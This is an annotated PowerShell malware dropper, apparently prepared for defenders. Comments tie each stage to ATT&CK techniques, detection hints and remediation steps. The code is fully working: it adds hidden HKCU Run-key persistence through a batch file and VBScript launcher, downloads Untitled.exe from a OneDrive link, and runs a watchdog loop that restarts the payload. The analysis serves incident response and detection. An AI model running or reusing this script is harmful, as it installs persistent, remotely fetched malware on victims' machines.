# Stage 0: create the staging directory that every later step writes into.
# The folder borrows a well-known brand name under C:\ProgramData, while nothing
# in this script relates to that product, so the path itself is a host indicator
# (presumably chosen to blend in - confirm against the host's installed software).
$OutPath = "C:\ProgramData\Twitter\log\"
if (-not (Test-Path  $OutPath ))
        {
            # Only reached when the staging directory does not exist yet.
            New-Item $OutPath -ItemType Directory -Force
        }

# Fixed 5-second pause before the next stage.
start-sleep 5

# Stage 1: build a batch file that registers three per-user autorun values.
# All three are added under HKCU\...\CurrentVersion\Run, a key the current user
# can write without admin rights (ATT&CK T1547.001, Registry Run Keys).
#   value "1" -> Untitled.exe in the staging directory
#   value "2" -> look.ps1 (written later in this script) through cmd.exe and powershell
#   value "3" -> Outlook.ps1 under C:\ProgramData\Facebook\...; this script never
#                creates that file, so it presumably belongs to another stage -
#                responders should check that path as well.
# "-windo 1" and "-exec bypass" are abbreviated forms of -WindowStyle (1 = Hidden)
# and -ExecutionPolicy Bypass; detections that match only the full parameter
# names will miss these command lines.
# The here-string is single-quoted, so PowerShell expands nothing inside it.
$Content = @'

REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 3 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Facebook\System32\Microsoft\SystemData\Outlook.ps1"
'@
# The batch file is dropped into the shared Public profile; a script file created
# there by powershell.exe is a useful file-creation event to alert on.
Set-Content -Path C:\Users\Public\22.bat -Value $Content

# Stage 2: write a VBScript launcher for 22.bat and run it (ATT&CK T1059.005).
# The only functional lines create a WScript.Shell object and call Run on
# C:\Users\Public\22.bat with window style 0 (hidden) and bWaitOnReturn = true,
# so the REG ADD commands execute without a visible console window.
# The repeated "'Please open file form Your PC" lines are VBScript comments and
# have no run-time effect (presumably filler - their purpose is not evident here).
$Content = @'
'Please open file form Your PC
'Please open file form Your PC
'Please open file form Your PC
set WshShell = wscript.createobject("WScript.shell")
'Please open file form Your PC
WshShell.run """C:\Users\Public\22.bat"" ", 0, true
'Please open file form Your PC
Set WshShell = Nothing
'Please open file form Your PC
'@
Set-Content -Path C:\Users\Public\22.vbs -Value $Content
# Fixed 10-second pause, then "start" (alias of Start-Process) opens the .vbs
# through its file association - normally wscript.exe. The expected hunt pattern is
# powershell.exe -> wscript.exe -> cmd.exe -> reg.exe (verify in process telemetry).
start-sleep 10
start C:\Users\Public\22.vbs


# Stage 3: drop an application manifest next to the payload (Untitled.exe.manifest).
# requestedExecutionLevel is "asInvoker" with uiAccess "false", i.e. the binary
# requests no elevation; this matches the HKCU-only autoruns set earlier.
# The BEGIN_VBSEDIT_DATA / END_VBSEDIT_DATA comment suggests the payload was
# produced by a script-to-EXE packager (presumably VbsEdit - confirm on the sample).
# NOTE(review): the data between those two markers is not present in this copy.
# The manifest is written before the executable itself is downloaded.
$Content = @'

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
<!--BEGIN_VBSEDIT_DATA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END_VBSEDIT_DATA-->



'@
Set-Content -Path C:\ProgramData\Twitter\log\Untitled.exe.manifest -Value $Content




# Stage 4: fetch the payload binary (ATT&CK T1105, Ingress Tool Transfer).
# The file comes from a OneDrive direct-download link; the cid, resid and authkey
# query values are network indicators for this sample. Because the host is a
# mainstream cloud service, blocking the domain is rarely practical - hunt instead
# for powershell.exe issuing the request and then writing an .exe under C:\ProgramData.
$url = "https://onedrive.live.com/Download?cid=6BCBE135551869F2&resid=6BCBE135551869F2%21162&authkey=AKoUVA0wQIwWPYg" 
$path = "C:\ProgramData\Twitter\log\Untitled.exe" 
# Leftover from a parameterised form of this snippet; both values are hard-coded above.
# param([string]$url, [string]$path) 

# $targetFile is assigned here but never read anywhere in the visible script;
# the download below always uses $path.
if(!(Split-Path -parent $path) -or !(Test-Path -pathType Container (Split-Path -parent $path))) { 
$targetFile = Join-Path $pwd (Split-Path -leaf $path) 
} 

# Net.WebClient.DownloadFile saves the response body directly to $path.
(New-Object Net.WebClient).DownloadFile($url, $path) 
# Emits the destination path to the pipeline.
$path




# Fixed 5-second pause after the download.
start-sleep 5
# Stage 5: write the watchdog script look.ps1 into the staging directory.
# Its loop has no exit condition: every 60 seconds it looks for a process named
# "Untitled" and starts Untitled.exe again when none is found.
# Remediation order matters: stop the powershell.exe instance running look.ps1
# (and remove the Run values that relaunch it) before killing the payload process,
# otherwise the payload is restarted within a minute.
$Content = @'
while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{
}
start C:\ProgramData\Twitter\log\Untitled.exe
}
start-sleep 60
}
'@
Set-Content -Path C:\ProgramData\Twitter\log\look.ps1 -Value $Content

# Fixed 5-second pause before the watchdog is started.
start-sleep 5


# Stage 6: start the watchdog now instead of waiting for the next logon
# (ATT&CK T1059.001). look.ps1 loops forever, so this child powershell.exe is not
# expected to return, leaving a long-lived powershell.exe -> powershell.exe pair
# (presumably - confirm in process telemetry).
# Command-line indicators: -WindowStyle hidden and -ExecutionPolicy Unrestricted
# together with a script path under C:\ProgramData.
powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\ProgramData\Twitter\log\look.ps1"










